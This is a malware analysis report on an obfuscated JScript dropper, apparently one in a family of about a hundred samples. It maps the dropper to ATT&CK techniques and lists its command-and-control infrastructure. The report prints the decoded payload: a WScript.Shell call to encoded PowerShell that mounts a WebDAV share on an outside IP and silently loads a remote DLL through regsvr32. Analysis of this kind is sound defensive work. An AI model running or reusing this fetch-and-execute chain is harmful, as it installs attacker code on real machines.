typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighcreated2026-07-23updated2026-07-23
SHA-256: 89fd643618c268008ce852b2a1e14d752dd6024eed078a3a7539425b5a186f26

89fd643618c268008ce852b2a1e14d752dd6024eed078a3a7539425b5a186f26 — Deep Analysis Report

Filename: 3243530978161144024.js
Size: 108,073 bytes
Family: unclassified-js-webdav-dropper — ninety-seventh confirmed sibling.
Dynamic analysis: CAPE skipped — JScript is not a supported binary class ^[dynamic-analysis.md].


1. Build / RE

Language: JScript (Windows Script Host), single-line, no line terminators ^[file.txt].

Obfuscation engine: js-dictionary-char-lookup-obfuscation — a 100-entry random-noise dictionary (wqthp object) mapping meaningless 6-character lowercase keys (e.g. nupyd, davcd, cnamgz) to individual ASCII characters and control codes ^[strings.txt:1]. The payload string is assembled via nested Function("return this")()["eval"](...) constructors, chaining wqthp['key'] lookups with + concatenation. This is the same assembly pattern observed across the entire family ^[raw/analyses/fbdd83ad.../report.md] ^[raw/analyses/e2568b43.../report.md].

Decoding: Two-layer decode required. The outer layer uses the 100-entry dictionary to resolve character tokens inside a Function(...)["eval"](...) expression. The resolved inner payload is itself another Function("return this")()["eval"](...) construct that builds the final WScript.Shell command string. After full decode, the plaintext is:

Function("return this")()["WScript"]["CreateObject"]("WScript.Shell")["run"](
  "powershell -EncodedCommand <base64>", 0, false
);

The Base64-decoded PowerShell command is:

timeout 1; plmzsx; net use \\94.159.113.84@8888\davwwwroot\; snidf;
regsvr32 /s \\94.159.113.84@8888\davwwwroot\300471679318983.dll; ovmjru

Anti-analysis: None. No debugger checks, no VM detection, no time-bombs, no connectivity gates. The timeout 1 is embedded in the inner PowerShell command, not in the JScript layer, and serves as a rudimentary anti-emulation delay ^[decoded-payload].

Code quality: Low — hand-written, repetitive, verbose, no commercial obfuscator signatures (no javascript-obfuscator, no RC4, no control-flow flattening). The 100-entry dictionary is larger than the family's historical 62-entry norm but smaller than the 100-entry maximum already observed in siblings fbdd83ad, e2568b43, c4670e86, f51f6323, f01dca2e, and 8323305a.

Signing / resources: N/A — text script, no Authenticode, no embedded PE resources.


2. Deploy / ATT&CK

Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) .js file executed by WScript ^[file.txt]
Execution T1059.001 (PowerShell) powershell -EncodedCommand wrapper ^[decoded-payload]
Execution T1218.010 (Regsvr32) regsvr32 /s \\94.159.113.84@8888\davwwwroot\300471679318983.dll ^[decoded-payload]
Defense Evasion T1218 (System Binary Proxy Execution) wscript.exe → powershell.exe → regsvr32.exe proxy chain ^[decoded-payload]
Defense Evasion T1027 (Obfuscated Files or Information) 100-entry noise-dictionary JScript obfuscation ^[strings.txt:1]
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP (\\94.159.113.84@8888\DavWWWRoot\) ^[decoded-payload]
Command & Control T1105 (Ingress Tool Transfer) net use mounts WebDAV share; regsvr32 fetches and loads remote DLL ^[decoded-payload]

C2 / Infrastructure:

  • Host: 94.159.113.84:8888 — same IP as six prior siblings (fbdd83ad 66th, e2568b43 83rd, c4670e86 76th, f51f6323 89th, f01dca2e 86th, 8323305a 94th). This is the seventh sibling on this exact endpoint, confirming sustained activity.
  • Payload: 300471679318983.dll (numeric filename, consistent with family naming).
  • Execution mode: regsvr32 /s (silent DLL registration), not rundll32 ...,Entry.

Persistence: None observed. One-shot execution via WScript.Shell.run() with windowstyle=0, wait=false. No registry writes, no scheduled tasks, no startup-folder copies ^[decoded-payload].

Lateral movement / Exfiltration: None observable statically. The DLL payload is not present in corpus; only the dropper stage is analysed here.

Attribution: No linguistic clues (keys are noise, no semantic content). Infrastructure overlap with the 94.159.113.x:8888 subnet is the only linkage. No code-reuse signatures beyond the family's shared assembly engine.


3. Verdict

High-confidence sibling of unclassified-js-webdav-dropper. The 100-entry dictionary size, wqthp object name, Function("return this")() assembly, PowerShell -EncodedCommand wrapper, and 94.159.113.84:8888 C2 are all consistent with established family patterns. No new capabilities or anti-analysis measures beyond the family's baseline.


Provenance:

  • Static decode performed on 2026-07-23 via Python regex-based token replacement and string-concatenation collapse.
  • dynamic-analysis.md confirms CAPE skipped (not a binary) ^[dynamic-analysis.md].
  • All behavioural claims derive from the decoded payload string; no runtime execution performed.